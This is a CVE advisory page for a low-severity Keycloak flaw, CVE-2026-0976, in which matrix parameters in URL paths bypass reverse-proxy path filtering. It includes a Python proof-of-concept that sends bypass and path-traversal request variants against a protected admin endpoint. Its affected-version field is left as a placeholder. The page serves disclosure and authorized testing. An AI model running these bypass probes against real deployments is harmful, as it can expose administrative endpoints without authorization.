Security Vulnerability Report
中文
CVE-2026-0976 CVSS 3.7 LOW

CVE-2026-0976

Published: 2026-01-15 13:16:05
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

A flaw was found in Keycloak. This improper input validation vulnerability occurs because Keycloak accepts RFC-compliant matrix parameters in URL path segments, while common reverse proxy configurations may ignore or mishandle them. A remote attacker can craft requests to mask path segments, potentially bypassing proxy-level path filtering. This could expose administrative or sensitive endpoints that operators believe are not externally reachable.

CVSS Details

CVSS Score
3.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Keycloak < 特定修复版本(需查看官方公告)
建议参考 Red Hat Security Advisory RHSA-XXXX 或 Keycloak 官方安全公告获取确切版本信息

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-0976 PoC - Matrix Parameter Injection Bypass # Target: Keycloak with reverse proxy that ignores matrix parameters # Affected: Proxy path filtering bypass import requests import sys def test_matrix_parameter_bypass(base_url, protected_endpoint): """ Test for matrix parameter injection vulnerability Keycloak accepts RFC-compliant matrix parameters that proxies may ignore """ # Normal request (blocked by proxy) normal_url = f"{base_url}{protected_endpoint}" # Bypass attempt using matrix parameter # The matrix parameter is embedded in the path segment bypass_url = f"{base_url}{protected_endpoint};matrix=hidden/console" headers = { "User-Agent": "CVE-2026-0976-PoC-Tester", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9" } print(f"[*] Testing CVE-2026-0976 Matrix Parameter Injection") print(f"[*] Target: {base_url}") print(f"[*] Protected Endpoint: {protected_endpoint}") print() # Test normal request print(f"[1] Testing normal request: {normal_url}") try: resp1 = requests.get(normal_url, headers=headers, timeout=10, allow_redirects=False) print(f" Status: {resp1.status_code}") except requests.RequestException as e: print(f" Error: {e}") print() # Test bypass request with matrix parameter print(f"[2] Testing bypass request: {bypass_url}") try: resp2 = requests.get(bypass_url, headers=headers, timeout=10, allow_redirects=False) print(f" Status: {resp2.status_code}") if resp2.status_code == 200: print(f" [VULNERABLE] Matrix parameter bypass may have worked!") print(f" Response length: {len(resp2.content)} bytes") elif resp2.status_code in [301, 302, 303, 307, 308]: print(f" [POTENTIAL] Redirect detected - check Location header") print(f" Location: {resp2.headers.get('Location', 'N/A')}") else: print(f" Request blocked or not found") except requests.RequestException as e: print(f" Error: {e}") # Additional test cases with various matrix parameters test_cases = [ f"{protected_endpoint};auth=admin", f"{protected_endpoint};x=/../admin", f"{protected_endpoint};bypass=true/../../../admin", ] print() print("[3] Testing additional bypass variations:") for i, test_path in enumerate(test_cases, 1): test_url = f"{base_url}{test_path}" print(f" Test {i}: {test_url}") try: resp = requests.get(test_url, headers=headers, timeout=10, allow_redirects=False) print(f" Status: {resp.status_code}") except requests.RequestException as e: print(f" Error: {e}") if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve_2026_0976_poc.py <base_url> <protected_endpoint>") print("Example: python cve_2026_0976_poc.py http://target.com /admin") sys.exit(1) base_url = sys.argv[1].rstrip('/') protected_endpoint = sys.argv[2] test_matrix_parameter_bypass(base_url, protected_endpoint)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0976", "sourceIdentifier": "[email protected]", "published": "2026-01-15T13:16:04.910", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Keycloak. This improper input validation vulnerability occurs because Keycloak accepts RFC-compliant matrix parameters in URL path segments, while common reverse proxy configurations may ignore or mishandle them. A remote attacker can craft requests to mask path segments, potentially bypassing proxy-level path filtering. This could expose administrative or sensitive endpoints that operators believe are not externally reachable."}, {"lang": "es", "value": "Se encontró un defecto en Keycloak. Esta vulnerabilidad de validación de entrada incorrecta ocurre porque Keycloak acepta parámetros de matriz conformes con RFC en segmentos de ruta de URL, mientras que las configuraciones comunes de proxy inverso pueden ignorarlos o manejarlos incorrectamente. Un atacante remoto puede elaborar solicitudes para enmascarar segmentos de ruta, eludiendo potencialmente el filtrado de rutas a nivel de proxy. Esto podría exponer puntos finales administrativos o sensibles que los operadores creen que no son accesibles externamente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-0976", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429869", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.